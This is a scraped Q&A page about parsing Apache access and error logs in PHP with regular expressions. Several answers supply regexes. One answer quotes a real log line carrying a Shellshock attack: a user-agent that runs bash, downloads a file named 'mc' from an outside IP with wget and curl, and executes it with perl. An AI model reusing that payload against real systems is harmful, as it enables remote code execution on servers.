Parse Apache log in PHP using preg_match

后端 未结 5 1069
日久生厌
日久生厌 2020-12-23 14:34

I need to save data in a table (for reporting, stats etc...) so a user can search by time, user agent etc. I have a script that runs every day that reads the Apache Log and

相关标签:
5条回答
  • 2020-12-23 14:51

    As I've seen and done so many errneous log parsing, here is a hopefully valid regex, tested on 50k lines of logs without any single diff, knowing that:

    • auth_user can have spaces
    • response_size can be -
    • http_start_line can at least one space (HTTP/0.9) or two
    • http_start_line may contain double quotes
    • referrer can be empty, have spaces, or double quotes (it's just an HTTP header)
    • user_agent can be empty too, or contain double quotes, and spaces
    • It's hard to distinguish between referrer and user-agent, let's just home the " " between both is discriminent enough, yet we can find the infamous " " in the referrer and in the user-agent, so basically, we're screwed here.

      $ncsa_re = '/^(?P<IP>\S+)
      \ (?P<ident>\S)
      \ (?P<auth_user>.*?) # Spaces are allowed here, can be empty.
      \ (?P<date>\[[^]]+\])
      \ "(?P<http_start_line>.+ .+)" # At least one space: HTTP 0.9
      \ (?P<status_code>[0-9]+) # Status code is _always_ an integer
      \ (?P<response_size>(?:[0-9]+|-)) # Response size can be -
      \ "(?P<referrer>.*)" # Referrer can contains everything: its just a header
      \ "(?P<user_agent>.*)"$/x';
      

    Hope that's help.

    0 讨论(0)
  • 2020-12-23 14:55

    your regexp are wrong. you shoudl use correct regexp

    /^(\S+) (\S+) (\S+) - \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/
    
    0 讨论(0)
  • 2020-12-23 14:56

    To parse an Apache access_log log in PHP you can use this regex:

    $regex = '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/';
    preg_match($regex ,$log, $matches);
    

    To match the Apache error_log format, you can use this regex:

    $regex = '/^\[([^\]]+)\] \[([^\]]+)\] (?:\[client ([^\]]+)\])?\s*(.*)$/i';
    preg_match($regex, $log, $matches);
    $matches[1] = Date and time,           $matches[2] = severity,
    $matches[3] = client addr (if present) $matches[4] = log message
    

    It matches lines with or without the client:

    [Tue Feb 28 11:42:31 2012] [notice] Apache/2.4.1 (Unix) mod_ssl/2.4.1 OpenSSL/0.9.8k PHP/5.3.10 configured -- resuming normal operations
    [Tue Feb 28 14:34:41 2012] [error] [client 192.168.50.10] Symbolic link not allowed or link target not accessible: /usr/local/apache2/htdocs/x.js
    
    0 讨论(0)
  • 2020-12-23 15:04

    I've tried using a couple of the regexps here Jan 2015, and find that a bad bot is not getting a match in my apache2 log.

    The bad bot apache2 line is a BASH hack attempt, and I haven't tried to figure out the regexp correction yet:

    199.217.117.211 - - [18/Jan/2015:10:52:27 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""
    
    0 讨论(0)
  • 2020-12-23 15:07

    If you don't want to capture the double quotes, move them out of the capture groups.

     (\".*?\") 
    

    Should become:

     \"(.*?)\"
    

    As alternative you could just post-process the entries with trim($str, '"')

    0 讨论(0)
提交回复
热议问题